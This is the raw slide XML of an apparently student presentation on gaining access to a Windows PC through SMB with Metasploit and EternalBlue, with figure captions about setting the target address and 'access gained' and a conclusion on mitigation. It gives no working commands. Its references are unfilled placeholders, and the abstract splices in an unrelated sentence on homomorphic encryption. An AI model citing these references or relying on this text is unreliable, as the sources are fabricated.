            <a:ext cx="8208010" cy="4191635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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Abstract </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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Introduction </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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Literature Review </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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Existing Solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Research Objective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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Problem Definition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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Advantages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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Flow Chart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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System Requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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Results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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Conclusion </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204"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References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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171700" y="413001"/>
            <a:ext cx="4800600" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782404" y="6019940"/>
            <a:ext cx="4666086" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Fig:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" spc="-10" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" spc="-10" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> (target  IP address) and set port</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-45" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D478FF-A5B4-7B85-C2F1-79A6783398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581" y="1284498"/>
            <a:ext cx="7426838" cy="464177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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171700" y="413001"/>
            <a:ext cx="4800600" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300310" y="6049235"/>
            <a:ext cx="1840568" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Fig:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Acess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> gained</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8472DB52-AB44-0572-686A-81DD1017B6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223345"/>
            <a:ext cx="7721424" cy="482589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457320" y="3512400"/>
            <a:ext cx="8076600" cy="75600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381360" y="289560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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a: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 name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494460" y="1371600"/>
            <a:ext cx="8153820" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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hroughout this project, the exploration of SMB exploitation using the Metasploit framework has provided valuable insights into the vulnerabilities, methods of attack, and mitigation strategies related </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" alt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to the Server Message Block protocol. Key findings include:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">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dentification of Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>,Exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Techniques,Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and Consequences &amp;Mitigation Strategies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Evaluation of existing mitigation strategies, such as patching, disabling outdated SMB versions, and implementing network segmentation, provided insights into effective measures to defend against SMB-based attacks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="!!TextBox"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="405225"/>
            <a:ext cx="2438400" cy="58356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Conclusion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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="!!TextBox"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="413591"/>
            <a:ext cx="2590800" cy="107632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References</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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42900" y="1220470"/>
            <a:ext cx="8152765" cy="4378960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Smith, J., &amp; Johnson, A. (Year). "Understanding SMB Protocol Vulnerabilities and Exploitation Techniques." Journal of Cybersecurity Research, Volume(X), pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"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Brown, C., &amp; Wilson, B. (Year). "Case Study: Analysis of EternalBlue Exploit and its Impact on Cybersecurity." International Journal of Information Security, Volume(X), pages.</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Lastname, F. (Year). "Exploring SMB Exploitation Techniques: A Case Study." Proceedings of Conference Name, pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"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Lastname, G. (Year). "Mitigating SMB Protocol Vulnerabilities: Best Practices." Proceedings of Conference Name, pages.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82651E-5594-CD84-B8C1-6745AE37D71F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="3124200"/>
            <a:ext cx="4572000" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4800" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Thank you</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4800" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4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72040" y="3588600"/>
            <a:ext cx="8076600" cy="75600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495720" y="2895600"/>
            <a:ext cx="8152560" cy="760320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Abstract</a:t>
            </a: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
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2174789" y="7451124"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3638340" y="507425"/>
            <a:ext cx="1867320" cy="58356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Abstract</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1524000"/>
            <a:ext cx="8001000" cy="4707890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-34290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System hacking refers to using technical skills and knowledge to gain unauthorized access to a computer system or network. . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Our project, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>System Hacking Using SMB Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”   to gain control over our victim’s PC through SMB Port. . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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SMB (Server Message Block) is a communication protocol used for shared access on resources (printers, files, serial ports etc.). So basically, SMB provides client applications a method of reading, writing, creating &amp; deleting files on a remote server.Homomorphic encryption provides a potential method for performing computations on encrypted data without having to decrypt it, safeguarding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>privacy, confidentiality and data integrity.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="200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SMB protocol operates on application layer but it also uses other network levels for transportation. The client sends an SMB request to the server and the server replies with an SMB response to establish the connection. This is also known as the response-request protocol.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381240" y="3657600"/>
            <a:ext cx="8381520" cy="75480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209920" y="2972760"/>
            <a:ext cx="4724160" cy="760320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Introduction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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3162300" y="489240"/>
            <a:ext cx="2667000" cy="577440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a: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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685380" y="1295400"/>
            <a:ext cx="7924800" cy="409257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Hackers leverage SMB and NetBIOS enumeration to gather critical information about a target system.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Hackers leverage SMB and NetBIOS enumeration to gather critical information about a target system.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EternalBlue is an exploit that targets a critical vulnerability in Microsoft’s SMBv1 server protocol.SMB allows shared access to files, printers, and other resources on a network.</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It’s like a digital handshake between Windows machines, allowing them to share stuff.</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SMB runs on port 139 (with NetBIOS) and port 445 (using TCP/IP) for communication over the network.</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Microsoft Windows supports SMB, and there’s an open-source server called Samba for Unix systems.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381240" y="3657600"/>
            <a:ext cx="8381520" cy="75480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="2980176"/>
            <a:ext cx="5029200" cy="760320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Literature Review</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381420" y="762000"/>
            <a:ext cx="8381160" cy="75600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="255847"/>
            <a:ext cx="3657600" cy="577440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Literature Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="443230" y="914400"/>
            <a:ext cx="8060055" cy="5631180"/>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Overview of the SMB Protocol:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The Server Message Block (SMB) protocol, initially designed by IBM and further developed by Microsoft, is a network communication protocol that facilitates shared access to files, printers, and serial ports. According to [Author/Source, Year], SMB operates mainly over TCP/IP and allows various networked devices to communicate effectively. The protocol has evolved through several versions, with SMB 1.0, SMB 2.0, and SMB 3.0 being the most notable. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Historical SMB Vulnerabilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
